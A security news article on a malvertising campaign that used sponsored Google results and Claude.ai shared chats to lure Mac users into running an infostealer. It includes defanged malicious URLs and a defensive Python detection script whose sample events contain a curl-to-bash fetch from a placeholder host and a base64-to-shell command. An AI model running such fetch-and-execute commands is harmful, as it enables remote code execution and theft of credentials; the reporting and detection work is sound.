Mac Malware Spread Through Google Ads and Claude.ai Chats

May 11, 2026 04:01 · 12 min read
Malvertising Campaign Targets Mac Users

Attackers are exploiting Google Ads and legitimate Claude.ai shared chats to push Mac malware, as discovered by Berk Albayrak, a security engineer at Trendyol Group. The campaign was identified when users searching for 'Claude mac download' were presented with sponsored search results that appeared to be from the official Claude website, but instead led to instructions that installed malware on their Mac.

Albayrak found a Claude.ai shared chat that presented itself as an official 'Claude Code on Mac' installation guide, attributed to 'Apple Support.' The chat instructed users to open Terminal and paste a command, which silently downloaded and ran malware on their Mac. BleepingComputer verified the findings and discovered a second shared Claude chat carrying out the same attack through separate infrastructure.

MacOS Malware Analysis

The base64-encoded command shown in the shared Claude chat downloaded an encoded shell script from domains such as hxxp://customroofingcontractors[.]com/curl/b42a0ed9d1ecb72e42d6034502c304845d98805481d99cea4e259359f9ab206e and hxxps://bernasibutuwqu2[.]com/debug/loader.sh?build=a39427f9d5bfda11277f1a58c89b7c2d. The 'loader.sh' script ran entirely in memory, leaving little obvious trace on disk.

BleepingComputer observed the server serving a uniquely obfuscated version of the payload on each request, making it harder for security tools to flag the download based on a known hash or signature. The script collected the victim's external IP address, hostname, OS version, and keyboard locale, sending all of it back to the attacker. This kind of victim profiling before payload delivery suggests the operators are being selective about who they target.

Malware Behavior

The script then pulled down a second-stage payload and ran it through osascript, the macOS command-line tool for executing AppleScript. This gave the attacker remote code execution without ever dropping a traditional application or binary on disk. The variant identified by Albayrak appeared to skip the profiling steps and went straight to execution, harvesting browser credentials, cookies, and macOS Keychain contents, packaging them up, and exfiltrating them to the attacker's server.
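The delivery chain described above (a base64-decoded command piped into a shell, a remote script piped straight into a shell, and osascript spawned beneath that shell) leaves a recognisable parent/child pattern in process telemetry. The following is an added detection example, not code from the original article or from BleepingComputer; the event records are constructed to resemble EDR or unified-log process events and use the placeholder domain example.invalid rather than the campaign's real infrastructure.

```python
import re

# Constructed process-execution events (not real telemetry from the campaign):
# pid 2 decodes a base64 blob into bash, pid 3 pipes a download into bash,
# pid 4 is osascript launched under that chain. pid 6 is a benign base64 use.
EVENTS = [
    {"pid": 1, "ppid": 0, "process": "Terminal", "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"pid": 2, "ppid": 1, "process": "zsh", "cmdline": "/bin/zsh -c echo aGVsbG8= | base64 -d | bash"},
    {"pid": 3, "ppid": 2, "process": "bash", "cmdline": "bash -c curl -fsSL http://example.invalid/loader.sh | bash"},
    {"pid": 4, "ppid": 3, "process": "osascript", "cmdline": "osascript -e 'do shell script \"id\"'"},
    {"pid": 5, "ppid": 1, "process": "git", "cmdline": "git status"},
    {"pid": 6, "ppid": 1, "process": "zsh", "cmdline": "/bin/zsh -c base64 -D archive.b64 > archive.tar"},
]

# Command-line patterns for the two first-stage behaviours. A bare base64
# decode or a plain curl is not flagged; only a pipe into a shell is.
RULES = {
    "base64_to_shell": re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:ba|z)?sh\b"),
    "download_to_shell": re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|z)?sh\b"),
}

def ancestors(event, by_pid):
    """Yield parent events, walking ppid links until the chain ends or loops."""
    seen = set()
    parent = by_pid.get(event["ppid"])
    while parent is not None and parent["pid"] not in seen:
        seen.add(parent["pid"])
        yield parent
        parent = by_pid.get(parent["ppid"])

def scan(events):
    """Return findings for first-stage shells and for osascript spawned under them."""
    by_pid = {e["pid"]: e for e in events}
    flagged = set()
    findings = []
    for e in events:
        for name, rx in RULES.items():
            if rx.search(e["cmdline"]):
                flagged.add(e["pid"])
                findings.append({"pid": e["pid"], "rule": name, "cmdline": e["cmdline"]})
    # Second stage: osascript whose ancestry includes a flagged shell is the
    # in-memory execution step; report which ancestors triggered it.
    for e in events:
        if e["process"] == "osascript":
            via = [a["pid"] for a in ancestors(e, by_pid) if a["pid"] in flagged]
            if via:
                findings.append({"pid": e["pid"], "rule": "osascript_under_flagged_shell", "cmdline": e["cmdline"], "via": via})
    return findings

if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f)
```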

Albayrak identified this as a variant of the MacSync macOS infostealer. The briskinternet[.]com domain used by that variant appeared to be down at the time of writing.

Malvertising Campaigns on the Rise

Malvertising has become a recurring delivery mechanism for malware. This campaign flips the traditional approach, as there is no fake domain to spot. Both Google ads seen here point to Anthropic's real domain, claude.ai, since the attackers are hosting their malicious instructions inside Claude's own shared chat feature.

Users should navigate directly to claude.ai to download the native Claude app, rather than clicking sponsored search results. The legitimate Claude Code CLI is available through Anthropic's official documentation and does not require pasting commands from a chat interface. As a general rule, treat any instructions asking you to paste terminal commands with caution, regardless of where those instructions appear to come from.


Source: BleepingComputer
